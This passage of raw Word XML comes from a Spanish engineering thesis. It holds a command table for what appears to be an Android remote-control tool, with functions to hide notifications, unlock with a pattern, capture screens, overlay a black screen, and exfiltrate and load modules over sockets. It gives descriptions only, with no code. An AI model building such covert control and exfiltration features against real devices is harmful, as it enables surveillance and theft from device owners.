          </w:tcPr>
          <w:p w14:paraId="6F16E190" w14:textId="68941A82" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Activa la ubicación GPS en el dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="51100DCD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62AF5054" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AA99601" w14:textId="61242C26" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>disable notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56ECAF5B" w14:textId="47500BBF" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Camino alternativo para esconder las notificaciones </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="3B61D783" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C36BC88" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AEBA5F7" w14:textId="7E7A1688" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>insert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D4AD888" w14:textId="03F8FBF7" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Introduce el texto indicado en el elemento que está siendo utilizado en la interfaz de usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="7A7C0182" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64F97CED" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523A806A" w14:textId="69C529B5" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295D4710" w14:textId="7F171892" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Trata de desbloquear el dispositivo utilizando el patrón indicado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="6EF25BBC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F9BA606" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="013D0B53" w14:textId="18A53692" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DE82C25" w14:textId="33CE3E09" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Realiza capturas de pantalla con opciones de comienzo, detención y reinicio de las capturas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="68E4B999" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D40BD3F" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47A8EFD4" w14:textId="204634AD" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>click</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37057EF8" w14:textId="098DA06A" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Realiza acciones de click en función de parámetros adicionales (back, power, up, down, lock…)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E2403" w14:paraId="17F3BBB0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FC2F79F" w14:textId="1B0C6FDB" w:rsidR="007E2403" w:rsidRDefault="007E2403">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>blackscreen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55A27244" w14:textId="77777777" w:rsidR="007E2403" w:rsidRDefault="007E2403">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54067CEF" w14:textId="1C76C4EF" w:rsidR="007E2403" w:rsidRDefault="009B4A99">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Activa una pantalla negra como overlay a la interfaz del dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="3A66E133" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13233336" w14:textId="22CB50EE" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48706B1E" w14:textId="4E5B248B" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>socket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BCA4933" w14:textId="6733BC53" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Exfiltración de módulos adicionales del sistema (archivos JAR) mediante sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="7781712E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D09402D" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46EFEDB1" w14:textId="24F03CF5" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7E75FD" w14:textId="2D8D4B80" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Exfiltración estándar de información de módulos </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="62492766" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F74AD5A" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2B1FCE" w14:textId="06B1D1BE" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="336FC79A" w14:textId="1BA08C55" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Realiza la descarga del módulo indicado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="13061E41" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA671DB" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B6AC955" w14:textId="4C646CFC" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ABA957F" w14:textId="04389891" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Carga las clases del módulo indicado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="108944A5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DC600EC" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="301E4BCE" w14:textId="4C14CA36" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>unload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154EF13C" w14:textId="17684B7A" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Elimina el módulo indicado de la lista de módulos cargados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F7B6372" w14:textId="77777777" w:rsidR="00465BF7" w:rsidRPr="00E95A92" w:rsidRDefault="00465BF7" w:rsidP="00E95A92"/>
    <w:sectPr w:rsidR="00465BF7" w:rsidRPr="00E95A92" w:rsidSect="005458E2">
      <w:headerReference w:type="even" r:id="rId132"/>
      <w:headerReference w:type="default" r:id="rId133"/>
      <w:footerReference w:type="even" r:id="rId134"/>
      <w:footerReference w:type="default" r:id="rId135"/>
      <w:headerReference w:type="first" r:id="rId136"/>
      <w:footerReference w:type="first" r:id="rId137"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1701" w:right="1418" w:bottom="1418" w:left="1701" w:header="709" w:footer="510" w:gutter="0"/>
      <w:pgNumType w:start="9"/>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4008DA" w14:textId="77777777" w:rsidR="000C1FC5" w:rsidRDefault="000C1FC5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0F8F436D" w14:textId="77777777" w:rsidR="000C1FC5" w:rsidRDefault="000C1FC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1"/>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Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Microsoft YaHei">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Liberation Serif">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="NSimSun">
    <w:panose1 w:val="02010609030101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000203" w:usb1="288F0000" w:usb2="00000016" w:usb3="00000000" w:csb0="00040001"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8E7D9F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">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EC9448" w14:textId="77777777" w:rsidR="00F4404F" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>J. A. Sousa Porto</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6FBAD364" w14:textId="77777777" w:rsidR="00F4404F" w:rsidRDefault="00F4404F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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3A35B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="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C07F64" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A9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F083F"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4B0C149B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00B07E97">
    <w:pPr>
      <w:ind w:right="3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0F6ADF" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="48EDD9DA">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r w:rsidRPr="48EDD9DA">
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>Raúl Núñez García</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475E52" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="36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98E2A8" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92"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IV</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="0A3C24B2" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00B07E97">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="2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C39043" w14:textId="50963467"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p w14:paraId="25DC539F" w14:textId="77777777" w:rsidR="00F4404F" w:rsidRDefault="00F4404F" w:rsidP="00217176">
    <w:pPr>
      <w:ind w:right="360"/>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2E6EFC" w14:textId="1F75A25C" w:rsidR="00217176" w:rsidRDefault="00217176" w:rsidP="00917CC7">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p w14:paraId="63E83F18" w14:textId="77777777" w:rsidR="00F4404F" w:rsidRDefault="00F4404F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>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0F9661" w14:textId="77777777" w:rsidR="000C1FC5" w:rsidRDefault="000C1FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6DC36F34" w14:textId="77777777" w:rsidR="000C1FC5" w:rsidRDefault="000C1FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>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B2DE8A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92">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E1AEF" w14:textId="77777777" w:rsidR="00F4404F" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="1" w:color="000000"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve">Grado en Ingeniería Informática                                                            </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="es-ES"/>
      </w:rPr>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE \* ARABIC </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>88</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="es-ES"/>
      </w:rPr>
      <w:t xml:space="preserve"> de </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>85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2EF2C" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="000C1FC5">
